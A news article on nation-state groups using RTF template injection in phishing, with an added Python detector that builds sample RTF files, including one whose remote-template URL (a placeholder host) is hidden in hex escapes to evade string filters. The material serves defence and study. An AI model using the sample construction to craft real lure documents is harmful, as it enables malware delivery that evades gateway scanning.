Nation-state-backed hacking groups are exploiting a simple but effective new technique to power phishing campaigns that spread malware and steal information of interest to their governments.
Cybersecurity researchers at Proofpoint say advanced persistent threat (APT) groups working on behalf of Russian, Chinese and Indian interests are using rich text format (RTF) template injections.
While the use of RTF text file attachments in phishing emails isn’t new, the technique being used by hackers is easier to deploy and more effective because it’s harder for antivirus software to detect – and many organisations won’t block RTF files by default because they’re part of everyday business operations.
The technique is RTF template injection. An RTF file can carry a template control word (`\*\template`) among its document-formatting properties that names the template Word should load alongside the document. By editing that property so it references a URL instead of a local file, attackers can weaponise an otherwise ordinary RTF file: when the document is opened, Word fetches remote content from a server the attackers control, and that content can deliver a malware payload to the victim's machine.
When the victim opens the document in Microsoft Word, Word follows the malicious URL to retrieve the payload while still displaying the decoy document, so nothing looks out of place.
Depending on what the remote template contains, the victim may still have to be persuaded to click "Enable Editing" or "Enable Content" before the payload runs, but with the right social engineering, especially behind a convincing lure, that step is routinely achieved.
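To make the description concrete, here is an added Python example (not code from the article or from Proofpoint) that shows what a template injection looks like inside an RTF file and how a scanner can pull the referenced target out of the bytes. The three sample documents, the host example.invalid and all function names are constructed for this illustration. The scanner goes slightly beyond the article: it also decodes RTF's own \'hh and \uN escapes, which standard RTF syntax permits inside the template group and which would hide the URL from a plain string search for "http" or ".dotm".

```python
import re
from urllib.parse import urlparse

# ---- Constructed samples (not real campaign files) -------------------------
URL = "http://example.invalid/templates/report.dotm"  # reserved, unroutable host

def hex_escape(text: str) -> bytes:
    """Write every byte of `text` as an RTF \\'hh escape."""
    return "".join(r"\'%02x" % b for b in text.encode("ascii")).encode("ascii")

HEADER = rb"{\rtf1\ansi\deff0"
BODY = rb"{\fonttbl{\f0 Calibri;}}\f0\fs24 Quarterly energy exploration update.\par}"

# 1. Template control word pointing at a remote URL in the clear.
PLAIN_RTF = HEADER + rb"{\*\template " + URL.encode("ascii") + rb"}" + BODY
# 2. Same document with the URL hidden behind \'hh escapes: the raw bytes
#    contain neither "http" nor ".dotm".
OBFUSCATED_RTF = HEADER + rb"{\*\template " + hex_escape(URL) + rb"}" + BODY
# 3. Benign document whose template is a local .dotm (backslashes doubled per RTF).
BENIGN_RTF = HEADER + rb"{\*\template C:\\Users\\jdoe\\Templates\\Normal.dotm}" + BODY

# ---- Scanner ---------------------------------------------------------------
TEMPLATE_GROUP = re.compile(rb"\{\\\*\\template(?P<body>[^{}]*)\}")
UNICODE_ESC = re.compile(rb"\\u(-?\d+) ?(?:\\'[0-9a-fA-F]{2}|[^\\{}])?")  # \uN + fallback char
CONTROL_WORD = re.compile(rb"\\[a-zA-Z]+-?\d* ?")                        # \word or \wordN
REMOTE_SCHEMES = {"http", "https", "ftp"}

def decode_rtf_text(raw: bytes) -> str:
    """Turn RTF-escaped text into a plain string, dropping formatting control words."""
    out, i, n = [], 0, len(raw)
    while i < n:
        if raw[i:i + 1] != b"\\":                        # ordinary byte (latin-1)
            out.append(chr(raw[i]))
            i += 1
            continue
        if raw[i + 1:i + 2] == b"'":                     # \'hh : one byte as two hex digits
            try:
                out.append(chr(int(raw[i + 2:i + 4], 16)))
            except ValueError:
                out.append("?")                          # malformed escape: keep scanning
            i += 4
            continue
        m = UNICODE_ESC.match(raw, i)                    # \uN : one code point (signed 16-bit)
        if m:
            cp = int(m.group(1))
            out.append(chr(cp + 65536 if cp < 0 else cp))
            i = m.end()
            continue
        m = CONTROL_WORD.match(raw, i)                   # \ansi, \uc1, ... : contribute no text
        if m:
            i = m.end()
            continue
        out.append(chr(raw[i + 1]) if i + 1 < n else "")  # control symbol: \\ \{ \} \*
        i += 2
    return "".join(out)

def is_remote_template(target: str) -> bool:
    """True when the template would be fetched from a network location."""
    t = target.strip()
    if t.startswith("\\\\") or t.startswith("//"):        # UNC share
        return True
    return urlparse(t).scheme.lower() in REMOTE_SCHEMES

def scan_rtf(rtf: bytes) -> list:
    """Return every template reference in the file with its decoded target."""
    findings = []
    for m in TEMPLATE_GROUP.finditer(rtf):
        target = decode_rtf_text(m.group("body")).strip()
        findings.append({"offset": m.start(), "target": target,
                         "remote": is_remote_template(target)})
    return findings

if __name__ == "__main__":
    samples = [("plain", PLAIN_RTF), ("obfuscated", OBFUSCATED_RTF), ("benign", BENIGN_RTF)]
    for name, doc in samples:
        for f in scan_rtf(doc):
            flag = "REMOTE TEMPLATE" if f["remote"] else "local template"
            print(f"{name:10s} offset {f['offset']:4d} {flag}: {f['target']}")
```

The check worth keeping from this is the decoding step: a gateway rule that only looks for `http` in the attachment bytes passes the obfuscated sample, while the decoded `\*\template` target is identical in both malicious documents. A local `.dotm` path, as in the benign sample, is normal and should not be flagged on its own.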
It isn't a sophisticated technique, but because it is simple and reliable it has become popular with several nation-state hacking operations, which can use it in place of more complex attacks and still get the same results.
Despite the “Advanced” designation, if APT actors are doing their job well, they will exert the least amount of resources and sophistication necessary to gain access to organisations, said Sherrod DeGrippo, vice president of threat research and detection at Proofpoint.
“This prevents actors from exposing more sophisticated tools if discovered, resulting in a greater operational disruption for threat actor groups to replace technical capabilities when discovered,” she added.
According to researchers, the earliest known instance of an APT group using RTF template injections in a campaign was in February 2021. These injections were undertaken by DoNot Team, an APT group that has been linked to Indian state interests.
Since then, several other state-linked hacking operations have also deployed RTF template injection in their campaigns. These include the group Proofpoint tracks as TA423, also known as Leviathan, an APT group linked to China, which has used RTF template injection attacks in several campaigns since April 2021.
One of these campaigns took place in September and targeted entities in Malaysia related to the energy exploration sector, using phishing emails specifically designed to lure targets into inadvertently executing the payload.
Then in October, researchers spotted Gamaredon, an offensive hacking group linked to the Russian Federal Security Service (FSB), using RTF template injection documents that impersonated the Ukrainian Ministry of Defence.
While only a handful of APT groups have deployed RTF template injection so far, researchers warn that its effectiveness combined with its ease of use is likely to drive wider adoption across the threat landscape, including by financially motivated cyber criminals.
“The ease of weaponisation in this technique will also likely attract low-end and low-sophistication actors, expanding the presence of this technique in the wild, including crimeware actors,” said DeGrippo.